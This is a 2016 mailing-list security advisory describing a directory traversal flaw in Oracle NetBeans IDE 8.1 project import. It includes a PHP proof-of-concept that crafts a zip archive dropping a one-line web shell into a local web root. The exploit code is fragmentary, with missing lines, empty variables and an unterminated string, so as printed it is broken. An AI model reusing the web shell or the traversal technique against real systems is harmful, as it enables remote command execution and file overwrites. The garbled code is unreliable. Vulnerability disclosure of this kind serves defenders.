lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Fri, 21 Oct 2016 16:34:34 GMT
Subject: Oracle Netbeans IDE v8.1 Import Directory Traversal

[+] Credits: John Page aka hyp3rlinx	

[+] Website:

[+] Source:

[+] ISR: ApparitionSec


Netbeans IDE v8.1

Vulnerability Type:
Import Directory Traversal  

CVE Reference:

Vulnerability Details:

This was part of Oracle Critical Patch Update for October 2016.

Vulnerability in the NetBeans component of Oracle Fusion Middleware (subcomponent: Project Import).
The supported version that is affected is 8.1. Easily exploitable vulnerability allows high privileged attacker with logon
to the infrastructure where NetBeans executes to compromise NetBeans. While the vulnerability is in NetBeans, attacks may significantly
impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some
of NetBeans accessible data as well as unauthorized read access to a subset of NetBeans accessible data and unauthorized ability to cause
a partial denial of service (partial DOS) of NetBeans. 

Vulnerability in way Netbeans processes  ".zip" archives to be imported as project. If a user imports a malicious project 
containing "../" characters the import will fail, yet still process the "../".  we can then place malicious scripts outside of
the target directory and inside web root if user is running a local server etc...

It may be possible to then execute remote commands on the affected system by later visiting the URL and access our script if that
web server is public facing, if it is not then it may still be subject to abuse internally by internal malicious users. Moreover,
it is also possible to overwrite files on the system hosting vulnerable versions of NetBeans IDE.


Exploit Code(s):

 #archive path traversal
 #target xampp htdocs as POC
 #by hyp3rlinx
 if($argc<4){echo "Usage: <zip name>, <path depth>, <RCE.php as default? Y/[file]>";exit();}
 $cmd='<?php exec($_GET["cmd"]); ?>';
 echo "Second flag <path depth> must be numeric!, you supplied '$argv[2]'";
 echo "Usage: enter a payload for file $exploit_file wrapped in double
 $zip = new ZipArchive();
 $res = $zip->open("$", ZipArchive::CREATE);
 $depth)."\\xampp\\htdocs\\".$exploit_file, $cmd);
 echo "\r\nExploit archive $ created using $exploit_file\r\n";
 echo "================ hyp3rlinx ===================";

Disclosure Timeline:
Vendor Notification: September 20, 2016
October 20, 2016 : Public Disclosure

Exploitation Technique:

Severity Level:

[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere.


Powered by blists - more mailing lists